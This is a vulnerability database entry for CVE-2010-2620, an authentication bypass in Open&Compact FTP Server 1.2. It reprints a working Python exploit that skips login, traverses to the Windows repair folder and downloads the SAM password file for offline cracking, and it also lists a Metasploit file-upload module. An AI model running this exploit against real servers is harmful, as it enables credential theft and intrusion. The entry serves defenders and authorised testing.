CVE-2010-2620

Severity: critical
Published 2010-07-02 · Modified 2026-04-29
CVSS v3: n/a
CVSS v4: n/a (not yet in upstream)
VIR risk: 10.0

Description

Open&Compact FTP Server (Open-FTPD) 1.2 and earlier allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first.

Predictions

Exploit likelihood: 20%
Patch ETA: n/a

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-13932 (remote, windows, verified)
Serge Gorbunov · 2010-06-18

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access

EDB-27401 (remote, windows, verified, python, 1 KB)
Wireghoul · 2013-08-07

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval

Source: Exploit-DB (python exploit)
#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking

import ftplib
import os

# Connect to server

ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )

# Note that we need no authentication at all!!

print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )

ftp.quit()
EDB-27556 (remote, windows, verified)
Metasploit · 2013-08-13

Open-FTPD 1.2 - Arbitrary File Upload (Metasploit)


Metasploit modules

Open-FTPD 1.2 Arbitrary File Upload

Application impact

Vendor     Product    Versions                 Fixed
open-ftpd  open-ftpd  1.2 and earlier          (none listed)
open-ftpd  open-ftpd  1.0                      (none listed)

References

CWEs

CWE-287

